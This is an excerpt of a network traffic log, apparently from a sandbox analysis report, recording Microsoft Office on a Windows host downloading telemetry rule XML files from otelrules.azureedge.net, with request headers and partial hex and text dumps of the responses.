                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            102192.168.2.44989813.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:40 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:41 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:41 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1358
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                            ETag: "0x8DC582BE6431446"
                                                                                                                                                                                            x-ms-request-id: 3a8ea751-101e-007a-417b-3b047e000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200541Z-178bfbc474btvfdfhC1NYCa2en00000000gg000000005r9a
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:41 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            103192.168.2.44989913.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:40 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:41 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:41 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1395
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                            ETag: "0x8DC582BDE12A98D"
                                                                                                                                                                                            x-ms-request-id: b9d90d28-901e-00a0-5d63-3b6a6d000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200541Z-185f5d8b95crwqd8hC1NYCps680000000as000000000b2d6
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:41 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            104192.168.2.44990013.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:41 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:41 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:41 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1358
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                            ETag: "0x8DC582BE022ECC5"
                                                                                                                                                                                            x-ms-request-id: 7865c287-e01e-003c-7664-3bc70b000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200541Z-178bfbc474bbbqrhhC1NYCvw7400000000qg000000000217
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:41 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            105192.168.2.44990113.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:42 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:42 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:42 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1389
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                            ETag: "0x8DC582BE10A6BC1"
                                                                                                                                                                                            x-ms-request-id: 46934538-601e-0050-507b-3b2c9c000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200542Z-178bfbc474bscnbchC1NYCe7eg00000000fg00000000mfqx
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:42 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            106192.168.2.44990213.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:42 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:43 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:43 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1352
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                            ETag: "0x8DC582BE9DEEE28"
                                                                                                                                                                                            x-ms-request-id: 2767d90f-601e-005c-618c-3af06f000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200543Z-185f5d8b95cjbkr4hC1NYCeu240000000ap0000000000sk4
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:43 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            107192.168.2.44990313.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:42 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:43 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:43 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1405
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                            ETag: "0x8DC582BE12B5C71"
                                                                                                                                                                                            x-ms-request-id: 538e08fd-a01e-0032-4b7d-3b1949000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200543Z-1777c6cb754lvj6mhC1TEBke940000000a60000000006d31
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:43 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            108192.168.2.44990413.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:42 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:43 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:43 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1368
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                            ETag: "0x8DC582BDDC22447"
                                                                                                                                                                                            x-ms-request-id: df1e4bb0-c01e-0034-6f8a-3a2af6000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200543Z-1777c6cb754mqztshC1TEB4mkc0000000a4g000000009rxt
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:43 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            109192.168.2.44990513.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:43 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:43 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:43 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1401
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                            ETag: "0x8DC582BE055B528"
                                                                                                                                                                                            x-ms-request-id: 07391f24-a01e-0032-508c-3a1949000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200543Z-r1d97b99577sdxndhC1TEBec5n00000009c000000000mgbn
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:43 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            110192.168.2.44990813.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:45 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:45 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:45 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1397
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                                                                                            ETag: "0x8DC582BE7262739"
                                                                                                                                                                                            x-ms-request-id: d8182971-801e-0067-2581-3bfe30000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200545Z-r1d97b99577brct2hC1TEBambg00000002yg00000000mkvz
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:45 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            111192.168.2.44990913.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:45 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:45 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:45 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1360
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                            ETag: "0x8DC582BDDEB5124"
                                                                                                                                                                                            x-ms-request-id: b47886c8-201e-00aa-0c8c-3a3928000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200545Z-178bfbc474bscnbchC1NYCe7eg00000000q0000000002nz5
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
